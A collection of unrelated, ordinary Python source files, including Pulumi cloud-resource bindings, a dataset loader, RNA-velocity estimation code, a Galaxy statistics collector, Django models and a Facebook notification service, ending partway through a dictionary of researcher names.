@overload def __init__(__self__, resource_name: str, args: RolePolicyAttachmentArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Provides a RAM Role attachment resource. ## Example Usage ```python import pulumi import pulumi_alicloud as alicloud # Create a RAM Role Policy attachment. role = alicloud.ram.Role("role", document=\"\"\" { "Statement": [ { "Action": "sts:AssumeRole", "Effect": "Allow", "Principal": { "Service": [ "apigateway.aliyuncs.com", "ecs.aliyuncs.com" ] } } ], "Version": "1" } \"\"\", description="this is a role test.", force=True) policy = alicloud.ram.Policy("policy", document=\"\"\" { "Statement": [ { "Action": [ "oss:ListObjects", "oss:GetObject" ], "Effect": "Allow", "Resource": [ "acs:oss:*:*:mybucket", "acs:oss:*:*:mybucket/*" ] } ], "Version": "1" } \"\"\", description="this is a policy test", force=True) attach = alicloud.ram.RolePolicyAttachment("attach", policy_name=policy.name, policy_type=policy.type, role_name=role.name) ``` ## Import RAM Role Policy attachment can be imported using the id, e.g. ```sh $ pulumi import alicloud:ram/rolePolicyAttachment:RolePolicyAttachment example role:my-policy:Custom:my-role ``` :param str resource_name: The name of the resource. :param RolePolicyAttachmentArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(RolePolicyAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, policy_name: Optional[pulumi.Input[str]] = None, policy_type: Optional[pulumi.Input[str]] = None, role_name: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = RolePolicyAttachmentArgs.__new__(RolePolicyAttachmentArgs) if policy_name is None and not opts.urn: raise TypeError("Missing required property 'policy_name'") __props__.__dict__["policy_name"] = policy_name if policy_type is None and not opts.urn: raise TypeError("Missing required property 'policy_type'") __props__.__dict__["policy_type"] = policy_type if role_name is None and not opts.urn: raise TypeError("Missing required property 'role_name'") __props__.__dict__["role_name"] = role_name super(RolePolicyAttachment, __self__).__init__( 'alicloud:ram/rolePolicyAttachment:RolePolicyAttachment', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, policy_name: Optional[pulumi.Input[str]] = None, policy_type: Optional[pulumi.Input[str]] = None, role_name: Optional[pulumi.Input[str]] = None) -> 'RolePolicyAttachment': """ Get an existing RolePolicyAttachment resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. 
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] policy_name: Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. :param pulumi.Input[str] policy_type: Type of the RAM policy. It must be `Custom` or `System`. :param pulumi.Input[str] role_name: Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _RolePolicyAttachmentState.__new__(_RolePolicyAttachmentState) __props__.__dict__["policy_name"] = policy_name __props__.__dict__["policy_type"] = policy_type __props__.__dict__["role_name"] = role_name return RolePolicyAttachment(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="policyName") def policy_name(self) -> pulumi.Output[str]: """ Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. """ return pulumi.get(self, "policy_name") @property @pulumi.getter(name="policyType") def policy_type(self) -> pulumi.Output[str]: """ Type of the RAM policy. It must be `Custom` or `System`. """ return pulumi.get(self, "policy_type") @property @pulumi.getter(name="roleName") def role_name(self) -> pulumi.Output[str]: """ Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ return pulumi.get(self, "role_name")
nilq/baby-python
python
# _*_coding:utf-8_*_
# @author:FelixFu
# @Date: 2021.4.14
# @github:https://github.com/felixfu520

import numpy as np
import os
import cv2

from base import BaseDataSet, BaseDataLoader


class BDDDataset(BaseDataSet):
    def __init__(self, **kwargs):
        self.num_classes = 29
        super(BDDDataset, self).__init__(**kwargs)

    def _set_files(self):
        """Collect the file names and class labels of all samples.
        """
        if self.val:
            list_path = os.path.join(self.root, "testlist.txt")
        else:
            list_path = os.path.join(self.root, "trainlist.txt")

        images, labels = [], []
        with open(list_path, 'r', encoding='utf-8') as images_labels:
            for image_label in images_labels:
                images.append(image_label.split(",,,")[0])
                labels.append(image_label.split(",,,")[1])
        self.files = list(zip(images, labels))

    def _load_data(self, index):
        """Load the image and its class label from the stored file name.
        :param index:
        :return: ndarray
        """
        image_path, label = self.files[index]
        # image_path = image_path.encode('utf8', errors='surrogateescape').decode('utf-8')
        if self.in_channels == 1:
            # Read via np.fromfile + imdecode so paths with non-ASCII (e.g. Chinese) characters work
            img = cv2.imdecode(np.fromfile(image_path.encode('utf8'), dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
        elif self.in_channels == 3:
            img = cv2.imdecode(np.fromfile(image_path.encode('utf8'), dtype=np.uint8), cv2.IMREAD_COLOR)
        return img, label, image_path


class BDD(BaseDataLoader):
    def __init__(self, data_dir, base_size=None, crop_size=None, augment=False, scale=True, flip=False, rotate=False,
                 blur=False, histogram=False, batch_size=1, num_workers=1, shuffle=False, in_channels=3, val=False):
        if in_channels == 3:
            self.MEAN = [0.45734706, 0.43338275, 0.40058118]    # mean & std differ between datasets; compute them once per dataset, do not reuse
            self.STD = [0.23965294, 0.23532275, 0.2398498]
        else:
            self.MEAN = [0.6790830900388274]  # [0.3858034032292721]
            self.STD = [0.25241563832076486]  # [0.12712721340420535]

        kwargs = {
            'root': data_dir,
            'mean': self.MEAN,
            'std': self.STD,
            'augment': augment,
            'crop_size': crop_size,
            'base_size': base_size,
            'scale': scale,
            'flip': flip,
            'blur': blur,
            'rotate': rotate,
            'histogram': histogram,
            'in_channels': in_channels,
            'val': val
        }

        self.dataset = BDDDataset(**kwargs)
        super(BDD, self).__init__(self.dataset, batch_size, shuffle, num_workers)
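# A minimal sketch of the list-file format _set_files() expects: one image path and
# one label per line, separated by ",,,". The path and label below are hypothetical;
# note that split()[1] keeps the trailing newline, so downstream code may need strip().
if __name__ == '__main__':
    demo_line = "images/0001.jpg,,,7\n"
    demo_path, demo_label = demo_line.split(",,,")[0], demo_line.split(",,,")[1]
    print(demo_path, demo_label.strip())   # images/0001.jpg 7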
nilq/baby-python
python
"""Closed-form solutions of the first-order transcription/splicing/degradation ODEs
(sol_u, sol_s, sol_p) and least-squares estimators for the kinetic parameters
(alpha, beta, gamma, eta, delta), wrapped in the `estimation` and `velocity` classes.
"""
import numpy as np
from scipy.optimize import least_squares
from sklearn.cluster import KMeans
from sklearn.neighbors import NearestNeighbors


def sol_u(t, u0, alpha, beta):
    return u0*np.exp(-beta*t) + alpha/beta*(1-np.exp(-beta*t))


def sol_s(t, s0, u0, alpha, beta, gamma):
    exp_gt = np.exp(-gamma*t)
    if beta == gamma:
        s = s0*exp_gt + (beta*u0-alpha)*t*exp_gt + alpha/gamma * (1-exp_gt)
    else:
        s = s0*exp_gt + alpha/gamma * (1-exp_gt) + (alpha - u0*beta)/(gamma-beta) * (exp_gt - np.exp(-beta*t))
    return s


def sol_p(t, p0, s0, u0, alpha, beta, gamma, eta, gamma_p):
    u = sol_u(t, u0, alpha, beta)
    s = sol_s(t, s0, u0, alpha, beta, gamma)
    exp_gt = np.exp(-gamma_p*t)
    p = p0*exp_gt + eta/(gamma_p-gamma)*(s-s0*exp_gt - beta/(gamma_p-beta)*(u-u0*exp_gt-alpha/gamma_p*(1-exp_gt)))
    return p, s, u


def fit_linreg(x, y, intercept=True):
    # simple least-squares line fit, ignoring NaN entries
    mask = np.logical_and(~np.isnan(x), ~np.isnan(y))
    xx = x[mask]
    yy = y[mask]
    ym = np.mean(yy)
    xm = np.mean(xx)

    if intercept:
        cov = np.mean(xx * yy) - xm * ym
        var_x = np.mean(xx * xx) - xm * xm
        k = cov / var_x
        b = ym - k * xm
    else:
        k = np.mean(yy) / np.mean(xx)
        b = 0
    return k, b


def fit_beta_lsq(t, l, bounds=(0, np.inf), fix_l0=False, beta_0=None):
    tau = t - np.min(t)
    l0 = np.mean(l[:, tau == 0])
    if beta_0 is None:
        beta_0 = 1

    if fix_l0:
        f_lsq = lambda b: (sol_u(tau, l0, 0, b) - l).flatten()
        ret = least_squares(f_lsq, beta_0, bounds=bounds)
        beta = ret.x
    else:
        f_lsq = lambda p: (sol_u(tau, p[1], 0, p[0]) - l).flatten()
        ret = least_squares(f_lsq, np.array([beta_0, l0]), bounds=bounds)
        beta = ret.x[0]
        l0 = ret.x[1]
    return beta, l0


def fit_gamma_lsq(t, s, beta, u0, bounds=(0, np.inf), fix_s0=False):
    tau = t - np.min(t)
    s0 = np.mean(s[:, tau == 0])
    g0 = beta * u0/s0

    if fix_s0:
        f_lsq = lambda g: (sol_s(tau, s0, u0, 0, beta, g) - s).flatten()
        ret = least_squares(f_lsq, g0, bounds=bounds)
        gamma = ret.x
    else:
        f_lsq = lambda p: (sol_s(tau, p[1], u0, 0, beta, p[0]) - s).flatten()
        ret = least_squares(f_lsq, np.array([g0, s0]), bounds=bounds)
        gamma = ret.x[0]
        s0 = ret.x[1]
    return gamma, s0


def fit_alpha_synthesis(t, u, beta):
    # fit alpha assuming u=0 at t=0
    expt = np.exp(-beta*t)

    # prepare x
    x = 1 - expt

    return beta * np.mean(u) / np.mean(x)


def fit_alpha_degradation(t, u, beta, mode=None):
    n = u.size
    tau = t - np.min(t)
    expt = np.exp(beta*tau)

    # prepare x
    x = expt - 1
    xm = np.mean(x)

    # prepare y
    y = u * expt
    ym = np.mean(y)

    # calculate slope
    var_x = np.mean(x**2) - xm**2
    cov = np.sum(y.dot(x)) / n - ym * xm
    k = cov / var_x

    # calculate intercept
    b = ym - k * xm if mode != 'fast' else None

    return k * beta, b


class velocity:
    def __init__(self, alpha=None, beta=None, gamma=None, eta=None, delta=None, estimation=None):
        if estimation is not None:
            self.parameters = {}
            self.parameters['alpha'] = estimation.parameters['alpha']
            self.parameters['beta'] = estimation.parameters['beta']
            self.parameters['gamma'] = estimation.parameters['gamma']
            self.parameters['eta'] = estimation.parameters['eta']
            self.parameters['delta'] = estimation.parameters['delta']
        else:
            self.parameters = {'alpha': alpha, 'beta': beta, 'gamma': gamma, 'eta': eta, 'delta': delta}

    def vel_u(self, U):
        if self.parameters['alpha'] is not None and self.parameters['beta'] is not None:
            V = self.parameters['alpha'] - (self.parameters['beta'] * U.T).T
        else:
            V = np.nan
        return V

    def vel_s(self, U, S):
        if self.parameters['beta'] is not None and self.parameters['gamma'] is not None:
            V = self.parameters['beta'] * U.T - self.parameters['gamma'] * S.T
            V = V.T
        else:
            V = np.nan
        return V

    def vel_p(self, S, P):
        if self.parameters['eta'] is not None and self.parameters['delta'] is not None:
            V = self.parameters['eta'] * S.T - self.parameters['delta'] * P.T
            V = V.T
        else:
            V = np.nan
        return V

    def get_n_cells(self):
        if self.parameters['alpha'] is not None:
            n_cells = self.parameters['alpha'].shape[1]
        else:
            n_cells = np.nan
        return n_cells

    def get_n_genes(self):
        if self.parameters['alpha'] is not None:
            n_genes = self.parameters['alpha'].shape[0]
        else:
            n_genes = np.nan
        return n_genes


class estimation:
    def __init__(self, U=None, Ul=None, S=None, Sl=None, P=None, t=None,
                 experiment_type='deg', assumption_mRNA=None, assumption_protein='ss'):
        self.t = t
        self.data = {'uu': U, 'ul': Ul, 'su': S, 'sl': Sl, 'p': P}
        self.extyp = experiment_type
        self.asspt_mRNA = assumption_mRNA
        self.asspt_prot = assumption_protein
        self.parameters = {'alpha': None, 'beta': None, 'gamma': None, 'eta': None, 'delta': None}

    def fit(self, intercept=True, perc_left=5, perc_right=5, clusters=None):
        n = self.get_n_genes()
        # fit mRNA
        if self.asspt_mRNA == 'ss':
            if np.all(self._exist_data('uu', 'su')):
                self.parameters['beta'] = np.ones(n)
                gamma = np.zeros(n)
                for i in range(n):
                    U = self.data['uu'] if self.data['ul'] is None else self.data['uu'] + self.data['ul']
                    S = self.data['su'] if self.data['sl'] is None else self.data['su'] + self.data['sl']
                    # steady-state fit is done gene by gene
                    gamma[i], _ = self.fit_gamma_steady_state(U[i], S[i], intercept, perc_left, perc_right)
                self.parameters['gamma'] = gamma
        else:
            if self.extyp == 'deg':
                if np.all(self._exist_data('ul', 'sl')):
                    # beta & gamma estimation
                    self.parameters['beta'], self.parameters['gamma'] = self.fit_beta_gamma_lsq(self.t, self.data['ul'], self.data['sl'])
                    if self._exist_data('uu'):
                        # alpha estimation
                        alpha = np.zeros(n)
                        for i in range(n):
                            alpha[i], _ = fit_alpha_degradation(self.t, self.data['uu'][i], self.parameters['beta'][i], mode='fast')
                        self.parameters['alpha'] = alpha
            elif self.extyp == 'kin':
                if self._exist_data('ul'):
                    if not self._exist_parameter('beta'):
                        # beta & gamma estimation: only works when there're at least 2 time points
                        self.parameters['beta'], self.parameters['gamma'] = self.fit_beta_gamma_lsq(self.t, self.data['uu'], self.data['su'])
                    # alpha estimation
                    alpha = np.zeros_like(self.data['ul'])
                    for i in range(n):
                        for j in range(len(self.data['ul'][i])):
                            alpha[i, j] = fit_alpha_synthesis(self.t, self.data['ul'][i], self.parameters['beta'][i])
                    self.parameters['alpha'] = alpha
            # 'one_shot'
            elif self.extyp == 'one_shot':
                if self._exist_data('ul') and self._exist_parameter('beta'):
                    self.parameters['alpha'] = self.fit_alpha_oneshot(self.t, self.data['ul'], self.parameters['beta'], clusters)
        # fit protein
        if np.all(self._exist_data('p', 'su')):
            if self.asspt_prot == 'ss':
                self.parameters['eta'] = np.ones(n)
                delta = np.zeros(n)
                for i in range(n):
                    s = self.data['su'][i] + self.data['sl'][i] if self._exist_data('sl') else self.data['su'][i]
                    delta[i], _ = self.fit_gamma_steady_state(s, self.data['p'][i], intercept, perc_left, perc_right)
                self.parameters['delta'] = delta

    def fit_gamma_steady_state(self, u, s, intercept=True, perc_left=5, perc_right=5):
        n = len(u)
        i_left = int(perc_left/100.0*n) if perc_left is not None else n
        i_right = int((100-perc_right)/100.0*n) if perc_right is not None else 0
        mask = np.zeros(n, dtype=bool)
        mask[:i_left] = mask[i_right:] = True
        return fit_linreg(s[mask], u[mask], intercept)

    def fit_beta_gamma_lsq(self, t, U, S):
        n = len(U)
        beta = np.zeros(n)
        gamma = np.zeros(n)
        for i in range(n):
            beta[i], u0 = fit_beta_lsq(t, U[i])
            gamma[i], _ = fit_gamma_lsq(t, S[i], beta[i], u0)
        return beta, gamma

    def fit_alpha_oneshot(self, t, U, beta, clusters=None):
        n_genes, n_cells = U.shape
        if clusters is None:
            clusters = [[i] for i in range(n_cells)]
        alpha = np.zeros((n_genes, len(clusters)))
        for i, c in enumerate(clusters):
            for j in range(n_genes):
                if len(c) > 0:
                    alpha[j, i] = fit_alpha_synthesis(t, U[j][c], beta[j])
                else:
                    alpha[j, i] = np.nan
        return alpha

    def get_n_genes(self):
        return len(self.data[self.get_exist_data_names()[0]])

    def set_parameter(self, name, value):
        if len(np.shape(value)) == 0:
            value = value * np.ones(self.get_n_genes())
        self.parameters[name] = value

    def _exist_data(self, *data_names):
        if len(data_names) == 1:
            ret = self.data[data_names[0]] is not None
        else:
            ret = np.array([self.data[k] is not None for k in data_names], dtype=bool)
        return ret

    def _exist_parameter(self, *param_names):
        if len(param_names) == 1:
            ret = self.parameters[param_names[0]] is not None
        else:
            ret = np.array([self.parameters[k] is not None for k in param_names], dtype=bool)
        return ret

    def get_exist_data_names(self):
        ret = []
        for k, v in self.data.items():
            if v is not None:
                ret.append(k)
        return ret
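

if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): wire `estimation`
    # and `velocity` together on synthetic data. The array layout assumed here
    # (genes x replicates x time points for the labeled data, genes x cells for
    # the expression snapshots) is inferred from the indexing in the code above.
    rng = np.random.RandomState(0)
    t = np.array([0.0, 1.0, 2.0, 4.0])           # labeling time points
    n_genes = 3
    Ul = rng.rand(n_genes, 2, t.size) + 0.1       # labeled unspliced counts, 2 replicates
    Sl = rng.rand(n_genes, 2, t.size) + 0.1       # labeled spliced counts, 2 replicates

    est = estimation(Ul=Ul, Sl=Sl, t=t, experiment_type='deg')
    est.fit()                                     # per-gene beta and gamma via least squares
    print('beta :', est.parameters['beta'])
    print('gamma:', est.parameters['gamma'])

    # velocities for an (arbitrary) genes x cells expression snapshot
    U_obs = rng.rand(n_genes, 10)
    S_obs = rng.rand(n_genes, 10)
    vel = velocity(estimation=est)
    print('spliced velocity shape:', vel.vel_s(U_obs, S_obs).shape)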
nilq/baby-python
python
#!/usr/bin/env #Imports import subprocess from collections import defaultdict import re import os import string import sys import argparse import datetime def transform_groups(blob): lines = blob.stdout.decode('utf-8').split('\n') stat = defaultdict(lambda: defaultdict()) months = [] for line in lines: line = line.strip() if re.match(r'\d+', line): tmp = re.split("\s+\|\s+", line) if tmp[1] == 'History Retention Keeplist': continue stat[tmp[1]][tmp[0]] = tmp[2] months.append(tmp[0]) months = set(months) output = 'User_group' for month in sorted(months): output += '\t' + str(month) output += '\n' for key in sorted(stat.keys()): output += key for month in sorted(months): if month in stat[key].keys(): output += '\t' + str(stat[key][month]) else: output += '\t0' output += '\n' return output def transform_monthly(blob): lines = blob.stdout.decode('utf-8').split('\n') stat = defaultdict() for line in lines: line = line.strip() if re.match(r'\d+', line): tmp = re.split('\s+\|\s+', line) stat[tmp[0]] = tmp[1] output1 = '' output2 = '' for month in sorted(stat.keys()): output1 += '\t' + month output2 += '\t' + stat[month] output = output1 + '\n' + output2 + '\n' return output def transform_destination(blob): lines = blob.stdout.decode('utf-8').split('\n') stat = defaultdict(lambda: defaultdict()) months = [] for line in lines: line = line.strip() if re.match(r'\d+', line): tmp = re.split("\|", line) tmp = list(map(str.strip, tmp)) if tmp[1] == '': dest = 'Meta' else: dest = (tmp[1].split("_"))[0] if tmp[0] in stat[dest].keys(): stat[dest][tmp[0]] += int(tmp[2]) else: stat[dest][tmp[0]] = int(tmp[2]) months.append(tmp[0]) months = set(months) output = 'Destination' for month in sorted(months): output += '\t' + str(month) output += '\n' for key in sorted(stat.keys()): output += key for month in sorted(months): if month in stat[key].keys(): output += '\t' + str(stat[key][month]) else: output += '\t0' output += '\n' return output def collect(queries, args): #get the year year = datetime.datetime.now().year for q in queries: #make command cmd = q['command'].split() if not args.initialize: cmd.append(str(year)) db_stat = subprocess.run(cmd, stdout=subprocess.PIPE) if q['type'] == 'group': stat = transform_groups(db_stat) elif q['type'] == 'monthly': stat = transform_monthly(db_stat) elif q['type'] == 'destination': stat = transform_destination(db_stat) print(q['header']) print(stat) print() #Main def main(): VERSION = 0.1 AUTHOR = 'Simon Gladman' LICENSE = 'GPLv3' DATE_CREATED = 'Aug 2020' parser = argparse.ArgumentParser(description="Collects monthly statistics for Galaxy Australia") parser.add_argument("-i", "--initialize", help="Runs the script as though its the first time. 
Collects all stats from entire history.", action='store_true') #parser.add_argument("-c", "--config_file", help="The config file to use - contains all of the querys to run.") parser.add_argument("-t", "--type", help="Only run the queries of this type") parser.add_argument("-p", "--print_queries", help="Print out the queries to be collected and exit", action='store_true') parser.add_argument('--version', action='store_true') parser.add_argument('--verbose', action='store_true') args = parser.parse_args() if args.version: print("monthly_stats_collector.py version: %.1f" % VERSION) return query_list = [ { 'header': 'Monthly Users Registered Per Group', 'command': 'gxadmin local query-monthly-users-registered-by-group', 'type': 'group' }, { 'header': 'Monthly Active Users Per Group', 'command': 'gxadmin local query-monthly-users-active-by-group', 'type': 'group' }, { 'header': 'Monthly Jobs Per Group', 'command': 'gxadmin local query-monthly-jobs-by-group', 'type': 'group' }, { 'header': 'Monthly New Data Per Group', 'command': 'gxadmin local query-monthly-new-data-by-group', 'type': 'group' }, { 'header': 'Monthly Jobs', 'command': 'gxadmin query monthly-jobs', 'type': 'monthly' }, { 'header': 'Monthly New Users', 'command': 'gxadmin query monthly-users-registered', 'type': 'monthly' }, { 'header': 'Monthly Users Active', 'command': 'gxadmin query monthly-users-active', 'type': 'monthly' }, { 'header': 'Monthly New Data', 'command': 'gxadmin query monthly-data', 'type': 'monthly' }, { 'header': 'Monthly Jobs Per Destination', 'command': 'gxadmin local query-monthly-jobs-per-destination', 'type': 'destination' } ] if args.print_queries: print('Query Type\tQuery Name\tQuery Command') for q in query_list: print(q['type'] + '\t' + q['header'] + '\t' + q['command']) exit() if args.type: queries = [] for q in query_list: if q['type'] == args.type: queries.append(q) collect(queries, args) else: collect(query_list, args) if __name__ == "__main__": main()
nilq/baby-python
python
from django.db import models
from django.contrib.auth.models import User
from django.forms import ModelForm, Textarea, TextInput, Select
from django.utils import timezone


# Create your models here.
class Unvetted(models.Model):
    token_address = models.CharField(max_length=120)
    telegram_url = models.CharField(max_length=120)
    image = models.ImageField(upload_to='media')
    #proof_of_payment = models.CharField(max_length=200, blank=True, default=None)
    pub_date = models.DateTimeField(default=timezone.now)
    status = models.BooleanField(default=False)

    def __str__(self):
        return self.token_address


class Banner(models.Model):
    title = models.CharField(max_length=200)
    text = models.CharField(max_length=500)
    link = models.CharField(max_length=100)
    image = models.ImageField(upload_to='media')
    company_name = models.CharField(max_length=100)
    interest = models.CharField(max_length=200)
    budget = models.CharField(max_length=100)
    proof_of_payment = models.CharField(max_length=100)
    about_project = models.TextField()
    pub_date = models.DateTimeField(default=timezone.now)
    status = models.BooleanField(default=False)

    def __str__(self):
        return self.title


class IotexChart(models.Model):
    price = models.CharField(max_length=200)
    pub_date = models.DateTimeField(default=timezone.now)
    status = models.BooleanField(default=False)

    def __str__(self):
        return self.price
nilq/baby-python
python
from .base_options import BaseOptions


class TrainOptions(BaseOptions):
    def initialize(self):
        BaseOptions.initialize(self)
        self._parser.add_argument('--total_epoch', type=int, default=20, help='total epoch for training')
        self._parser.add_argument('--learning_rate', type=float, default=0.0001, help='initial learning rate')
        self._parser.add_argument('--decay_rate', type=float, default=0.99, help='decay rate')
        self._parser.add_argument('--batch_size', type=int, default=2, help='input batch size')
        self.is_train = True
nilq/baby-python
python
import json
import os.path
import codecs

from sampledata.exceptions import ParameterError

LOCALES = ['us']
OCCUPATIONS_PATH = os.path.join(os.path.dirname(__file__), 'occupations')


class Occupation(object):
    data = {}

    def __load_locale(self, locale):
        locale_path = os.path.join(OCCUPATIONS_PATH, "{0}.json".format(locale))
        if not os.path.exists(locale_path):
            raise ParameterError('Not valid locale')

        fd = codecs.open(locale_path, 'r', encoding='utf-8')
        Occupation.data[locale] = json.load(fd)
        fd.close()

    def get_occupations(self, locale):
        if locale not in Occupation.data:
            self.__load_locale(locale)
        return [x for x in Occupation.data[locale]['occupations']]

    def all_occupations(self):
        occupations = []
        for locale in LOCALES:
            occupations += self.get_occupations(locale)
        return occupations

    def generate(self, sd, locale=None):
        if locale:
            occupations = self.get_occupations(locale)
        else:
            occupations = self.all_occupations()
        return sd.choice(occupations)
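

if __name__ == '__main__':
    # Hedged usage sketch (not part of the original file): skip the on-disk
    # JSON by pre-populating the class-level cache, and use a small stand-in
    # for the `sd` helper, which only needs to provide a `choice` method.
    import random

    class _FakeSampleData:
        def choice(self, options):
            return random.choice(options)

    Occupation.data['us'] = {'occupations': ['Accountant', 'Nurse', 'Teacher']}
    print(Occupation().generate(_FakeSampleData(), locale='us'))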
nilq/baby-python
python
"""Facebook platform for notify component.""" import json import logging from aiohttp.hdrs import CONTENT_TYPE import requests import voluptuous as vol from homeassistant.components.notify import ( ATTR_DATA, ATTR_TARGET, PLATFORM_SCHEMA, BaseNotificationService, ) from homeassistant.const import CONTENT_TYPE_JSON import homeassistant.helpers.config_validation as cv _LOGGER = logging.getLogger(__name__) CONF_PAGE_ACCESS_TOKEN = "page_access_token" BASE_URL = "https://graph.facebook.com/v2.6/me/messages" CREATE_BROADCAST_URL = "https://graph.facebook.com/v2.11/me/message_creatives" SEND_BROADCAST_URL = "https://graph.facebook.com/v2.11/me/broadcast_messages" PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( {vol.Required(CONF_PAGE_ACCESS_TOKEN): cv.string} ) def get_service(hass, config, discovery_info=None): """Get the Facebook notification service.""" return FacebookNotificationService(config[CONF_PAGE_ACCESS_TOKEN]) class FacebookNotificationService(BaseNotificationService): """Implementation of a notification service for the Facebook service.""" def __init__(self, access_token): """Initialize the service.""" self.page_access_token = access_token def send_message(self, message="", **kwargs): """Send some message.""" payload = {"access_token": self.page_access_token} targets = kwargs.get(ATTR_TARGET) data = kwargs.get(ATTR_DATA) body_message = {"text": message} if data is not None: body_message.update(data) # Only one of text or attachment can be specified if "attachment" in body_message: body_message.pop("text") if not targets: _LOGGER.error("At least 1 target is required") return # broadcast message if targets[0].lower() == "broadcast": broadcast_create_body = {"messages": [body_message]} _LOGGER.debug("Broadcast body %s : ", broadcast_create_body) resp = requests.post( CREATE_BROADCAST_URL, data=json.dumps(broadcast_create_body), params=payload, headers={CONTENT_TYPE: CONTENT_TYPE_JSON}, timeout=10, ) _LOGGER.debug("FB Messager broadcast id %s : ", resp.json()) # at this point we get broadcast id broadcast_body = { "message_creative_id": resp.json().get("message_creative_id"), "notification_type": "REGULAR", } resp = requests.post( SEND_BROADCAST_URL, data=json.dumps(broadcast_body), params=payload, headers={CONTENT_TYPE: CONTENT_TYPE_JSON}, timeout=10, ) if resp.status_code != 200: log_error(resp) # non-broadcast message else: for target in targets: # If the target starts with a "+", it's a phone number, # otherwise it's a user id. if target.startswith("+"): recipient = {"phone_number": target} else: recipient = {"id": target} body = { "recipient": recipient, "message": body_message, "messaging_type": "MESSAGE_TAG", "tag": "ACCOUNT_UPDATE", } resp = requests.post( BASE_URL, data=json.dumps(body), params=payload, headers={CONTENT_TYPE: CONTENT_TYPE_JSON}, timeout=10, ) if resp.status_code != 200: log_error(resp) def log_error(response): """Log error message.""" obj = response.json() error_message = obj["error"]["message"] error_code = obj["error"]["code"] _LOGGER.error( "Error %s : %s (Code %s)", response.status_code, error_message, error_code )
nilq/baby-python
python
"""jinjalint Usage: jinjalint [options] [INPUT ...] Options: -h --help Show this help message and exit. --version Show version information and exit. -v --verbose Verbose mode. -c --config FILE Specify the configuration file. The configuration file must be a valid Python file. """ from docopt import docopt from .lint import lint, resolve_file_paths from .config import parse_config from ._version import get_versions def print_issues(issues, config): sorted_issues = sorted( issues, key=lambda i: (i.location.file_path, i.location.line), ) for issue in sorted_issues: print(str(issue)) def main(): arguments = docopt(__doc__) input_names = arguments['INPUT'] or ['.'] verbose = arguments['--verbose'] if arguments['--version']: print(get_versions()['version']) return if arguments['--config']: if verbose: print('Using configuration file {}'.format(arguments['--config'])) config = parse_config(arguments['--config']) else: config = {} config['verbose'] = verbose paths = list(resolve_file_paths(input_names, extensions=['.html'])) if verbose: print('Files being analyzed:') print('\n'.join(str(p) for p in paths)) print() issues = lint(paths, config) print_issues(issues, config) if any(issues): exit(1) if __name__ == '__main__': main()
nilq/baby-python
python
import logging import re from datetime import datetime class SFHelper(object): @staticmethod def get_pi_name(path, log = True): pi_names = {"staudt": "Louis_Staudt", "Staudt": "Louis_Staudt", "Soppet": "Daniel_Soppet", "Schrump": "David_Schrump", "Shrump": "David_Schrump", "Electron": "Electron_Kabebew", "Hager": "Gordon_Hager", "Hunter": "Kent_Hunter", "KentHuter": "Kent_Hunter", "Jonathan_Keller_Sun": "Jonathan_Keller", "Nagao": "Keisuke_Nagao", "Bustin": "Michael_Bustin", "Restifo": "Nicholas_Restifo", "Philipp_Oberdoerffer_Kim": "Philipp_Oberdoerffer", "Xin_Wei_Wang": "Xin_Wang", "Pommier": "Yves_Pommier", "Vinson": "Chuck_Vinson", "Batchelor": "Eric_Batchelor", "Brownell": "Issac_Brownell", "Ji_Luo": "Ji_Luo", "ShivGrewal": "Shiv_Grewal", "Raffeld": "Mark_Raffeld", "Javed": "Javed_Khan", "_tumor": "Tomas_Villmas", "_pancreas": "Tomas_Villmas", "JingHuang": "Jing_Huang", "Aladjem": "Mirit_Aladjem", "Alajem": "Mirit_Aladjem", "Muegge": "Kathrin_Muegge", "Li_Yang": "Li_Yang", "Thiele": "Carol_Thiele", "Bosselut": "Remy_Bosselut", "Frederick_Barr": "Frederick_Barr", "Trinchieri": "Giorgio_Trinchieri", "Ripley": "Taylor_Ripley", "Alfred_Singer": "Alfred_Singer", "Sample_SPECS_2070": "Louis_Staudt", "Pastan": "Ira_Pastan", "Merlino": "Glenn_Merlino", "Udayan": "Udayan_Guha", "LiYang": "Li_Yang", "Bhandoola":"Avinash_Bhandoola", "Levens": "David_Levens", "SteveHughes": "Stephen_Hughes", "StephenHuges": "Stephen_Hughes", "Shalini": "Shalini_Oberdoerffer", "Strathern": "Jeff_Strathern", "HonpingZheng": "Honping_Zheng", "Wakefield": "Lalage_Wakefield", "LiWang": "Li_Wang", "Guerrerio": "Pamela_Guerrerio", "KathyKelly": "Kathy_Kelly", "ShuoGu": "Shuo_Gu", "MarkGilbert": "Mark_Gilbert", "Yamini": "Yamini_Dalal", "AartiGautam": "Aarti_Gautam", "Hernandez": "Jonathan_Hernandez", "DinahSinger": "Dinah_Singer", "Reid": "Thomas_Reid", "JingHuang": "Jing_Huang", "YingZhang": 